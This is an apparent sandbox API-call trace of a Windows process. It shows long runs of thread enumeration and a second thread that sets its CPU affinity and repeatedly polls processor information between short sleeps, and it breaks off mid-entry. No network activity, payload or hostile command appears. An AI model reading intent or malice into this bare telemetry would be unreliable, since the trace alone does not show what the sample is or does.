1 [0041.209] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.210] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.210] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.211] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.211] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.212] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.212] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.212] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.213] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.213] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.214] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.214] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.215] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.215] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.216] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.216] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.216] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.217] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.217] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.218] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.218] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.219] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.219] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.220] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.220] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.220] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.221] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.221] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.222] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.222] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.223] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.223] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.223] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.224] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.224] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.225] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.225] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.226] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.226] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.227] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.227] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.227] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.228] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.228] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.230] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.230] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.231] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.231] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.232] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.232] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.233] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.233] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.234] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.234] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.234] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.235] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.235] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.236] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.236] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.237] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.237] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.237] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.238] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.238] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.239] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.239] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.240] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.240] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.241] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.241] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.241] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.242] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.242] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.243] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.243] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.244] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.244] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.245] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.245] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.246] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.246] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.246] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.247] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.247] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.248] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.248] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.249] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.249] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.250] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.250] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.250] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.251] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.251] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.252] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.252] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.253] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.253] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.253] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.254] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.254] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.255] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.255] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.256] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.256] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.256] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.257] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.257] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.258] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.258] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.259] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.259] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.260] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.260] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.261] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.261] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.262] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.262] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.263] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.263] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.263] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.264] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.264] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.265] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.265] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.266] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.266] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.266] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.267] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.267] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.268] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.268] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.269] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.269] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.270] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.270] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.270] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.271] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.271] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.272] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.272] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.273] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.273] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.273] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.274] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.274] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.275] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.275] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.276] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.276] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.277] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.277] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.278] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.278] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.278] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.279] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.279] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.280] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.280] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.281] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.281] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.281] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.282] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.282] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.283] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.283] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.284] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.284] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.284] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.285] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.285] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.286] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.286] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.287] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.287] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.288] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.288] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.288] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.289] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.289] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.290] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.290] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.291] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.291] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.295] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.296] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.296] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.297] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.297] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.298] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.298] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.298] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.299] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.299] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.300] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.300] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.301] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.301] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.301] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.302] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.302] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.303] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.303] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.304] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.304] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.304] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.305] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.305] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.306] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.306] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.307] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.307] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.308] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.308] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.308] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.309] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.309] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.310] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.310] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.311] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.311] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.312] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.312] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.414] CloseHandle (hObject=0xb4) returned 1 [0041.414] OpenThread (dwDesiredAccess=0x100000, bInheritHandle=0, dwThreadId=0xee8) returned 0xb4 [0041.414] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xee8 [0041.230] GetCurrentThread () returned 0xfffffffe [0041.230] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0041.230] SetThreadPriority (hThread=0xfffffffe, nPriority=-1) returned 1 [0041.414] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xbc [0041.414] GetVersion () returned 0x1db10106 [0041.414] GetCurrentProcessId () [0041.414] GetCurrentProcessId () returned 0xed8 [0041.414] OpenProcess (dwDesiredAccess=0x10047a, bInheritHandle=0, dwProcessId=0xed8) returned 0xc0 [0041.414] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0041.414] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.447] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.448] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0041.448] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.449] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.449] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0041.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.449] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.449] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0041.449] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0041.450] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.450] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0041.450] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.450] Sleep (dwMilliseconds=0x80) [0041.588] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0041.588] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.589] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.589] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0041.589] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.590] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.590] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0041.590] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.591] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.591] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0041.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0041.591] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.591] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0041.592] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.592] Sleep (dwMilliseconds=0x40) [0041.666] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0041.666] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.667] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.667] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0041.667] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.668] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.668] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0041.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.669] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.669] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0041.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0041.670] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.670] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0041.671] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.671] Sleep (dwMilliseconds=0x60) [0041.776] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0041.776] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.777] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.777] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0041.777] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.778] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.778] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0041.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.779] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.779] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0041.779] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0041.779] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.780] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0041.780] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.781] Sleep (dwMilliseconds=0xd0) [0041.994] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x30) returned 0xf487d0 [0041.994] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x30, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.994] HeapFree (hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0) [0041.994] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x60) returned 0xf487d0 [0041.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x60, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.995] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x90) returned 0xf487d0 [0041.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0x90, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0xc0000004 [0041.996] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.996] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0xc0) returned 0xf487d0 [0041.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0xf487d0, Length=0xc0, ResultLength=0x104f5b0 | out: SystemInformation=0xf487d0, ResultLength=0x104f5b0*=0xc0) returned 0x0 [0041.996] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: hHeap=0xb50000) returned 1 [0041.996] RtlAllocateHeap (HeapHandle=0xb50000, Flags=0x0, Size=0x1000) returned 0xf487d0 [0041.997] HeapFree (in: hHeap=0xb50000, dwFlags=0x0, lpMem=0xf487d0 | out: 